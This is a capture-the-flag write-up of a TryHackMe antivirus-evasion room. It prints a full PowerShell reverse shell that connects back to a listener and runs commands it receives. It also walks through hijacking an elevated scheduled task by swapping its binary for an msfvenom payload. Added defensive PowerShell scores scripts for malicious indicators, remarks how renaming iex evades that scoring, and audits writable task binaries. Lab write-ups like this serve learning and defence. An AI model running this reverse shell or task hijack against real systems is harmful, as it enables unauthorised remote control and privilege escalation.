TryHackMe
Difficulty: Medium
Are you stealthy enough to evade all the updated security measures of the target?
Visit 10.66.133.142:8080 to pwn the machine.
The Challenge #
This seems to be an AV evasion challenge. We visit the target web page and are met by an upload form that says:
Please upload any .ps1 PowerShell script to see if it is malicious or not (Dev Mode). The tool is in dev-mode and only allow .ps1 format at this stage.
Reverse shell #
We upload a .ps1 reverse shell:

```powershell
$lhost="192.168.134.8";
$lport=4444;
$MAXCMDLENGTH=65535;
# Connect back to the listener and take its network stream
$client = New-Object System.Net.Sockets.TCPClient($lhost, $lport);
$stream = $client.GetStream();
$bytes = (New-Object byte[] $MAXCMDLENGTH);
# Send an initial prompt so the listener sees the shell is up
$out = ([text.encoding]::ASCII).GetBytes("PS $($pwd.Path)> ");
$stream.Write($out, 0, $out.Length);
# Read until the connection closes; run each command and return its output
while (($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) {
    $in = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i);
    try {
        $out = (iex $in 2>&1 | Out-String);
    }
    catch {
        $out = ($_ | Out-String);
    }
    $out = "$($out)PS $($pwd.Path)> ";
    $out = ([Text.Encoding]::ASCII).GetBytes($out);
    $stream.Write($out, 0, $out.Length);
    $stream.Flush();
}
$client.Close();
```

Then we start a listener:

And we receive a connection. No AV detection so far.
We land in ~/evader/documents and find log.txt and file.ps1 inside the Task directory. log.txt mentions a file called vulnerable.ps1.
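The upload page's dev-mode checker has to decide whether a .ps1 is malicious, and the script above sailed through it. The PowerShell below is an added illustration, not code from the original writeup or from the room, of a minimal static indicator check of the kind such a tool could run: it matches behaviour patterns (raw socket, dynamic execution, output capture piped back out) and returns a weighted verdict. The pattern list, weights, thresholds and both sample scripts are constructed assumptions. Signature matching like this is exactly what string obfuscation or encoding defeats, which is why a production checker also needs execution-time inspection (AMSI, script block logging) rather than text matching alone.

```powershell
# Added example (not part of the original writeup): a static indicator check of
# the kind the upload page's "is it malicious" dev tool might perform.
# Indicator patterns, weights and thresholds below are constructed assumptions.
function Get-PSScriptIndicators {
    param(
        [Parameter(Mandatory)][string]$ScriptText
    )
    # Each entry targets a behaviour, not a specific file: name, regex, weight.
    $indicators = @(
        @{ Name = 'RawTcpSocket';  Pattern = 'System\.Net\.Sockets\.TCPClient';           Weight = 3 },
        @{ Name = 'NetworkStream'; Pattern = '\.GetStream\(\)';                             Weight = 1 },
        @{ Name = 'DynamicExec';   Pattern = '(?i)(\biex\b|Invoke-Expression)';             Weight = 3 },
        @{ Name = 'WebDownload';   Pattern = '(?i)(DownloadString|Invoke-WebRequest|\biwr\b)'; Weight = 1 },
        @{ Name = 'Base64Decode';  Pattern = '(?i)FromBase64String';                        Weight = 1 },
        @{ Name = 'OutputCapture'; Pattern = '2>&1\s*\|\s*Out-String';                      Weight = 2 }
    )

    $hits = foreach ($ind in $indicators) {
        $matches = [regex]::Matches($ScriptText, $ind.Pattern)
        if ($matches.Count -gt 0) {
            [pscustomobject]@{ Indicator = $ind.Name; Count = $matches.Count; Weight = $ind.Weight }
        }
    }

    # Sum the weights by hand so an empty hit list cleanly scores zero
    $score = 0
    foreach ($h in $hits) { $score += $h.Weight }

    $verdict = 'clean'
    if ($score -ge 6)     { $verdict = 'likely-malicious' }
    elseif ($score -ge 3) { $verdict = 'suspicious' }

    [pscustomobject]@{
        Score   = $score
        Verdict = $verdict
        Hits    = @($hits)
    }
}

# Constructed samples: a harmless log-rotation script and a socket + iex pattern
$benign = @'
Get-ChildItem C:\Logs -Filter *.log | Where-Object LastWriteTime -lt (Get-Date).AddDays(-30) | Remove-Item
'@

$suspicious = @'
$client = New-Object System.Net.Sockets.TCPClient($lhost, $lport)
$stream = $client.GetStream()
$out = (iex $in 2>&1 | Out-String)
'@

Get-PSScriptIndicators -ScriptText $benign     | Format-List
Get-PSScriptIndicators -ScriptText $suspicious | Format-List
```

With these weights the benign sample scores 0 (clean) and the socket sample scores 9 (likely-malicious); renaming `iex` to a variable holding the command, or splitting the type name across string concatenations, drops the score to 0 without changing behaviour, which is the gap an AV evasion exercise is built around.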

We note that vulnerable.ps1 exists and will look at it later; for now we want our flag.
We move to the Desktop to search for the user flag, where we find an encoded flag.

Copying the output of encodedflag into CyberChef and using Auto Bake, it is decoded.

After following the link we are met with a site showing this text:

We have a hint: we know we must remove log files related to file uploads, so let's search for any log files related to uploads.
This is where I took a break. The new VM IP is 10.66.135.186.
When I came back I re-evaluated where I was. We know we must delete log files related to the uploads. I started back where we landed, in Documents, went to the Task folder and read log.txt. That log noted that log.txt had been modified, so we do a quick filesystem search for log.txt:

And we find a log.txt file inside the uploads directory of the web app.
Let's remove it and see what happens:

Then we revisit the page, where we are met with our user flag:

I thought this was a room about AV evasion, but so far we haven't had to do any obfuscation.
Privilege escalation #
Let's try to escalate to SYSTEM to get our root flag. I'm going to try to upload PrivescCheck.ps1 and see if it gets blocked by Defender.
It ran successfully; let's check the results:

We have a couple of high-severity vulnerabilities.


The one that sticks out to me the most is MYTHMTask in the system32 file path running as Administrator.

We see the task THMTask runs as Administrator and executes C:\xampp\DebugCrashTHM.exe.
Since we have write access to C:\xampp, we can replace the executable with a malicious one and run the task to execute it.
We use msfvenom to generate an exe reverse shell, transfer it to the target machine and save it under the same name as the original executable.

Then we start our listener and manually execute the task (or wait for its next scheduled run):

Now we are SYSTEM and can get our root flag:
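What PrivescCheck flagged here is a standard misconfiguration: a task that runs elevated but executes a binary sitting in a directory that low-privileged users can write to. The PowerShell below is an added audit example, not code from the original writeup, from PrivescCheck or from the room, that a defender can run as an administrator to find such tasks before they turn up as findings. It enumerates scheduled tasks, keeps those whose principal is SYSTEM, Administrator or run-level Highest, and checks the ACLs of each action's executable and of its parent directory for Allow entries granting write or modify rights to Users, Authenticated Users or Everyone. The two identity lists are constructed assumptions and should be tuned to the environment.

```powershell
# Added example (not part of the original writeup): audit scheduled tasks whose
# action binary, or the directory holding it, can be modified by low-privileged
# principals while the task itself runs with elevated rights.
# Run as an administrator on the host being reviewed. Both identity lists are
# constructed assumptions; extend them for your environment.
function Find-WritableElevatedTaskBinaries {
    param(
        [string[]]$LowPrivIdentities  = @('BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'Everyone'),
        [string[]]$ElevatedPrincipals = @('SYSTEM', 'NT AUTHORITY\SYSTEM', 'Administrator', 'BUILTIN\Administrators')
    )
    # Any of these rights lets the principal replace or alter the binary
    $writeMask = [System.Security.AccessControl.FileSystemRights]::Write -bor
                 [System.Security.AccessControl.FileSystemRights]::Modify -bor
                 [System.Security.AccessControl.FileSystemRights]::FullControl

    foreach ($task in Get-ScheduledTask) {
        $runAs = $task.Principal.UserId
        if (-not $runAs) { continue }
        $isElevated = ($ElevatedPrincipals -contains $runAs) -or ($task.Principal.RunLevel -eq 'Highest')
        if (-not $isElevated) { continue }

        foreach ($action in $task.Actions) {
            # Only exec actions carry an Execute path; COM handler actions are skipped
            $exe = $action.Execute
            if (-not $exe) { continue }
            $exe = [Environment]::ExpandEnvironmentVariables($exe.Trim('"'))
            if (-not (Test-Path -LiteralPath $exe)) { continue }

            # Check the file and its parent directory: a writable directory lets the
            # file be renamed and replaced even when the file's own ACL is tight.
            foreach ($path in @($exe, (Split-Path -Parent $exe))) {
                $acl = Get-Acl -LiteralPath $path
                foreach ($ace in $acl.Access) {
                    $grantsWrite = ($ace.FileSystemRights -band $writeMask) -ne 0
                    if ($ace.AccessControlType -eq 'Allow' -and $grantsWrite -and
                        ($LowPrivIdentities -contains $ace.IdentityReference.Value)) {
                        [pscustomobject]@{
                            Task     = "$($task.TaskPath)$($task.TaskName)"
                            RunsAs   = $runAs
                            Binary   = $exe
                            Writable = $path
                            Identity = $ace.IdentityReference.Value
                            Rights   = $ace.FileSystemRights
                        }
                    }
                }
            }
        }
    }
}

Find-WritableElevatedTaskBinaries | Format-Table -AutoSize
```

On a host configured like this room, the output would list the task with `Binary` C:\xampp\DebugCrashTHM.exe and `Writable` C:\xampp; the fix is either to move the binary under a directory whose ACL only lets administrators write, or to strip the Users write entry from C:\xampp and verify the task still runs.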

This was a good machine overall, pretty easy. I'm not sure what the stealthy part was about; maybe I didn't do this machine the way it was intended. Either way the machine is complete and I reinforced my learning.